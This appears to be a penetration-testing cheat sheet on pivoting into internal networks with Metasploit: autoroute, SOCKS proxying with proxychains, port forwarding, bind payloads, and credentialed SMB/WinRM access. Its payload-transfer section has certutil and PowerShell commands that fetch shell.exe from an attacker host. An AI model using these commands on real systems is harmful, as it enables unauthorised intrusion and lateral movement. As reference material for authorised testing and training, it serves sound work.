Pivot & Internal Network Access
Autoroute - Layer 3 Pivot via Meterpreter
# From within the pivot host's Meterpreter session:
run autoroute -s 192.168.0.0/24 # Add route to internal network
run autoroute -p # Print active routes
background# Alternative - post module
use post/multi/manage/autoroute
set SESSION <id>
set SUBNET 192.168.0.0
set NETMASK 255.255.255.0
runSOCKS Proxy
use auxiliary/server/socks_proxy
set SRVPORT 9050
set VERSION 4a
run -j# /etc/proxychains4.conf
socks4 127.0.0.1 9050Note: Do not set
Proxies socks4:127.0.0.1:9050on MSF modules that already use autoroute - the two mechanisms conflict. Useproxychainsonly for external binaries.
Host Discovery Through Pivot
| Command | Description |
|---|---|
use post/multi/gather/ping_sweep | ICMP ping sweep via Meterpreter (works through autoroute). |
set RHOSTS 192.168.0.1-254 | Target range. |
set SESSION <id> | Pivot session ID. |
use auxiliary/scanner/portscan/tcp | TCP port scan through autoroute. |
Note:
arp_sweepoperates at layer 2 and cannot traverse an autoroute tunnel. Always useping_sweeporportscan/tcpfor internal network discovery.
External Tools Through Proxychains
| Command | Description |
|---|---|
proxychains nmap -sT -Pn -p 22,80,445,3389,5985,10000 192.168.0.51 | Nmap TCP connect scan through proxy (must use -sT, not -sS). |
proxychains crackmapexec smb 192.168.0.61 -u administrator -p pass | CME SMB through proxy. |
proxychains crackmapexec winrm 192.168.0.61 -u administrator -p pass | CME WinRM through proxy. |
proxychains evil-winrm -i 192.168.0.61 -u administrator -p pass | evil-winrm through proxy. |
proxychains curl http://192.168.0.51:10000/ | HTTP through proxy. |
Port Forwarding - Meterpreter portfwd
| Command | Description |
|---|---|
portfwd add -l <local_port> -p <remote_port> -r <remote_IP> | Forward local port to remote host:port through pivot. |
portfwd add -l 8080 -p 80 -r 192.168.0.51 | Access internal host port 80 via localhost:8080. |
portfwd add -l 10000 -p 10000 -r 192.168.0.51 | Access internal host Webmin via localhost:10000. |
portfwd add -R -l <lport> -p <rport> -L <kali_IP> | Reverse port forward - route internal host traffic back to Kali. |
portfwd list | List active port forwards. |
portfwd delete -l <local_port> | Remove a specific forward. |
portfwd flush | Remove all port forwards. |
Bind vs. Reverse Payloads
| Situation | Payload type | Why |
|---|---|---|
| Internal host can reach Kali | Reverse TCP | Standard - target connects back to Kali |
| Internal host cannot reach Kali (pivot) | Bind TCP | Metasploit connects to the target through the route |
# Bind payload example - Metasploit connects to the target
set payload cmd/unix/bind_perl # Linux
set payload windows/x64/meterpreter/bind_tcp # Windows
set LHOST <internal_target_IP>
runPayload Transfer to Internal Hosts (Windows)
| Command | Description |
|---|---|
certutil -urlcache -split -f http://<kali_IP>:8080/shell.exe C:\Windows\Temp\shell.exe | Download payload via certutil (no PowerShell needed). |
powershell -c "Invoke-WebRequest http://<kali_IP>:8080/shell.exe -OutFile C:\Temp\shell.exe" | Download via PowerShell. |
# Serve payload from Kali
python3 -m http.server 8080Session Management
| Command | Description |
|---|---|
sessions -l | List all active sessions. |
sessions -i <id> | Interact with a session. |
sessions -u <id> | Upgrade a shell to Meterpreter. |
sessions -K | Kill all sessions. |